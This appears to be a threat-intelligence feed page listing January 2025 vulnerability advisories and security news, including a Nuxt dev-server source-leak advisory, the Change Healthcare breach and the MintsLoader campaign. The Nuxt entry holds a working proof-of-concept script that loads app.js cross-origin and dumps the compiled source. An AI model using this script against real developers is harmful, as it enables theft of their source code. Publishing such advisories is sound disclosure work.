Threat and Vulnerability Intelligence Database

CVE-2025-24361

Description: Summary: Source code may be stolen during development when using the webpack / rspack builder and you open a malicious web site.

Details: Because the request for a classic script made by a script tag is not subject to the same-origin policy, an attacker can inject <script src="http://localhost:3000/_nuxt/app.js"> in their site and run the script. By using Function::toString against the values in window.webpackChunknuxt_app, the attacker can get the source code.

PoC: Create a nuxt project with the webpack / rspack builder. Run npm run dev. Open http://localhost:3000. Run the script below in a web site that has a different origin. You can see the source code output in the document and the devtools console.

    const script = document.createElement('script')
    script.src = 'http://localhost:3000/_nuxt/app.js'
    script.addEventListener('load', () => {
      for (const page in window.webpackChunknuxt_app) {
        const moduleList = window.webpackChunknuxt_app[page][1]
        console.log(moduleList)
        for (const key in moduleList) {
          const p = document.createElement('p')
          const title = document.createElement('strong')
          title.textContent = key
          const code = document.createElement('code')
          code.textContent = moduleList[key].toString()
          p.append(title, ':', document.createElement('br'), code)
          document.body.appendChild(p)
        }
      }
    })
    document.head.appendChild(script)

It contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in t...

CVSS: MEDIUM (5.3)

EPSS Score: 0.04%

Source: Github Advisory Database (NPM)
January 27th, 2025 (5 months ago)
Description: The Open Web Application Security Project has recently introduced a new Top 10 project - the Non-Human Identity (NHI) Top 10. For years, OWASP has provided security professionals and developers with essential guidance and actionable frameworks through its Top 10 projects, including the widely used API and Web Application security lists. Non-human identity security represents an emerging
Source: TheHackerNews
January 27th, 2025 (5 months ago)
Description: UnitedHealth Group has disclosed that the February 2024 ransomware attack on its Change Healthcare subsidiary affected approximately 190 million individuals, nearly double its initial estimate of 100 million. The confirmation, provided to TechCrunch late Friday, makes this the largest medical data breach in U.S. history. In a statement, UnitedHealth spokesperson Tyler Mason acknowledged the staggering …
Source: CyberInsider
January 27th, 2025 (5 months ago)
Description: A previously unknown threat actor has been observed copying the tradecraft associated with the Kremlin-aligned Gamaredon hacking group in its cyber attacks targeting Russian-speaking entities. The campaign has been attributed to a threat cluster dubbed GamaCopy, which is assessed to share overlaps with another hacking group named Core Werewolf, also tracked as Awaken Likho and PseudoGamaredon.
Source: TheHackerNews
January 27th, 2025 (5 months ago)
Description: Threat hunters have detailed an ongoing campaign that leverages a malware loader called MintsLoader to distribute secondary payloads such as the StealC information stealer and a legitimate open-source network computing platform called BOINC. "MintsLoader is a PowerShell based malware loader that has been seen delivered via spam emails with a link to Kongtuke/ClickFix pages or a JScript file,"
Source: TheHackerNews
January 27th, 2025 (5 months ago)
Description: EXIF Viewer Classic provided by Rodrigue (former Kakera) contains a cross-site scripting vulnerability.
Source: Japan Vulnerability Notes (JVN)
January 27th, 2025 (5 months ago)

CVE-2025-24858

Description: Develocity (formerly Gradle Enterprise) before 2024.3.1 allows an attacker who has network access to a Develocity server to obtain the hashed password of the system user. The hash algorithm used by Develocity was chosen according to best practices for password storage and provides some protection against brute-force attempts. The applicable severity of this vulnerability depends on whether a Develocity server is accessible by external or unauthorized users, and the complexity of the System User password.

CVSS: HIGH (8.3)

EPSS Score: 0.04%

Source: CVE
January 27th, 2025 (5 months ago)

CVE-2025-0722

Description: A vulnerability classified as critical was found in needyamin image_gallery 1.0. This vulnerability affects unknown code of the file /admin/gallery.php of the component Cover Image Handler. The manipulation of the argument image leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. A vulnerability was discovered in needyamin image_gallery 1.0. It was classified as critical. Affected is unknown processing in the file /admin/gallery.php of the component Cover Image Handler. Manipulating the argument image with unknown data allows an unrestricted upload vulnerability to be exploited. The attack can be carried out over the network. The exploit is publicly available.

CVSS: MEDIUM (5.1)

EPSS Score: 0.07%

Source: CVE
January 27th, 2025 (5 months ago)